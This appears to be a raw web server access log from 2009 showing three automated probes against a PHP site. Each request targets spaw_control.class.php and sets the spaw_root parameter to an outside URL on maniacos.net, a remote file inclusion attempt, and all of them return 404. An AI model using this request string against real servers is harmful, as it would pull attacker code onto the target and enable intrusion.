74.54.223.100 - - [02/Dec/2009:10:48:53 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.115.43.161 - - [02/Dec/2009:10:48:55 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.115.43.161 - - [02/Dec/2009:10:48:58 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-"